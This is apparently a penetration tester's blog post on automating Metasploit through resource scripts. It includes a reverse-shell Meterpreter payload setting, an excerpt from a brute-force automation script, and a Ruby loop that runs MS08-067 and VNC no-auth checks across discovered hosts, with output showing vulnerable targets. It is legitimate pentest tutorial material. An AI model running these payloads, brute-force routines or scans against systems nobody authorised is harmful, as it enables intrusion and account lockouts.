Writing resource scripts for the Metasploit Framework

In December I purchased the certification course SMFE from security tube trainer Vivek Ramachandran. While watching the training videos, I started thinking of ways to speed up processes during a pentest engagement. With the dedault install of metasploit 4.2, you get postgresql database support. With this support you can import different 3rd party vulnerability scan reports, import xml nmap scans, add hosts manually, or run the db_nmap command which directly adds the hosts and services discovered. In the event I didn’t import a vulnerability scan into the database, I wanted a way to check the db list of hosts for easy exploitable vulnerabilities. I checked with Carlos Perez(darkoperator) and confirmed that resource scripts were the way to go. I couldn’t find much in the way of API documentation for these. My only source seemed to be the resource folder inside the scripts folder. There is enough code in each of the scripts that I was able to figure out how to accomplish what I wanted to do.  Basically there are two ways I could go about creating these scripts:

1. Create a comamand by command .rc file.

root@bt:~/.msf4# cat msfconsole.rc
set PAYLOAD windows/meterpreter/reverse_tcp
setg LHOST 10.10.200.40
set AutoRunScript post/windows/manage/migrate

2. Create a scripted file leveraging data in the datastore or database of hosts.

root@bt:/opt/metasploit/msf3/scripts/resource# cat auto_brute.rc
# auto_brute.rc
# Author: m-1-k-3 (Web: http://www.s3cur1ty.de / Twitter: @s3cur1ty_de)

# This Metasploit RC-File could be used to automate the bruteforce process
# the services are used from the already discovered service details of the database
# for this we need the service names in the db!
# VERBOSE is used from the global datastore
# THREADS is used from the global datastore
# USER_FILE and PASS_File is used from the global datastore

# WARNING: You could lock out users with this resource script!

#throttling if we get too much jobs
maxjobs = 8

wordlistpath = "#{Msf::Config.install_root}/data/wordlists"

if (framework.datastore['USER_FILE'] == nil)
# we are using the default unix wordlists
run_single("setg USER_FILE #{wordlistpath}/unix_users.txt")
end

I went with 2 beings I needed to access data located in the database of hosts. The script I am providing can be added to quite easily to leverage more auxiliary modules or exploits.

<ruby>
framework.db.hosts.each do |h|
       h.services.each do |serv|

if serv.port == 445 and h.os_flavor =~/XP|.NET Server|2003/i
                next if (serv.port != 445)
                print_good("#{h.address} seems to be Windows #{h.os_flavor}...")
                self.run_single("use exploit/windows/smb/ms08_067_netapi")
                print_good("Running ms08_067_netapi check against #{h.address}")
                self.run_single("set RHOST #{h.address}")
                self.run_single("check")
  
elsif serv.port == 5900 and h.os_name =~/Linux/i
                next if (serv.port != 5900)
                print_good("#{h.address} seems to be Linux #{h.os_flavor}...")
                self.run_single("use auxiliary/scanner/vnc/vnc_none_auth")
                print_good("Running VNC no auth check against #{h.os_flavor}")
                self.run_single("set RHOSTS #{h.address}")
                self.run_single("run")

else
        end
    end
end
</ruby>

To run this file launch msfconsole and at the prompt type:

msf > resource /root/checkvulns.rc

I have the file located in the root folder. It can also be placed in the scripts/resource folder. Here is the output of the script:

msf  exploit(ms08_067_netapi) > resource /root/checkvulns.rc
[*] Processing /root/checkvulns.rc for ERB directives.
[*] resource (/root/checkvulns.rc)> Ruby Code (829 bytes)
[+] 10.10.101.3 seems to be Windows .NET Server...
[+] Running ms08_067_netapi check against 10.10.101.3
RHOST => 10.10.101.3

[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
[+] 10.10.101.5 seems to be Linux Ubuntu...
[+] Running VNC no auth check against Ubuntu
RHOSTS => 10.10.101.5
[*] 10.10.101.5:5900, VNC server protocol version : 3.7
[*] 10.10.101.5:5900, VNC server security types supported : TLS,VNC
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
[+] 10.10.101.11 seems to be Windows XP...
[+] Running ms08_067_netapi check against 10.10.101.11
RHOST => 10.10.101.11
[*] Verifying vulnerable status... (path: 0x0000005a)
[+] The target is vulnerable.
Advertisements

Tags: , , , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: